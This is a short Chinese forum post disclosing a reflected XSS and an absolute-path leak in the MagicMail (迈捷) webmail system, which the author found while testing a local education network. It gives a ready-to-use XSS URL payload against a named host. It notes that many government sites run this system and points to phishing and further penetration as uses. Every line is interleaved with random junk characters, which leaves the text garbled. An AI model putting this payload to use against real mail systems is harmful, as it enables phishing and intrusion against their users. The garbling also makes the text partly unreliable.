今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞9 K! [: i+ D0 M# r4 m% d
3 j0 Q0 w' r2 _9 }
" [3 o, @! q/ L$ y* V# B& N- k( Y
包含 一个反射性XSS 以及 绝对路径泄漏
2 v' J4 R& G) p3 v看了看 貌似全部是linux的。
0 @! A0 M& h6 h' ^, V 6 B7 B8 ^9 r6 o/ n7 I1 Y7 `/ Q
关键字:迈捷邮件系统 by MagicMail
! {$ A7 W- t0 t }9 Q: K w* [
5 Y# I0 Q( r# @$ t; `/ t可以看到很多政府网站都用这个邮件系统
: ^5 d& S2 T) K" f/ s1 X/ i. y1 Z5 P. [1 g3 g# g/ m* A) s
绝对路径 http://madman.in/index.php?login_type=declare&language=( k) M. t" E7 \" Z5 M
5 @9 {* d P9 g7 o. u
% k4 A$ ]% T7 n5 t- V, C U/ C# M5 w q7 t. X5 M4 J
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
+ T% J N+ h0 g7 y% a/ m/ {# b$ q/ q4 B* J6 C
/ u+ ?* t& d; v/ p* Z0 @' j f* o
/ n* X( i0 @2 ~1 @' G虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
; z2 ]# V5 j1 y* v
) k. v8 w8 ]5 r5 j+ d修复方案:看官方补丁吧。
, _* K1 f7 }- j0 b& N |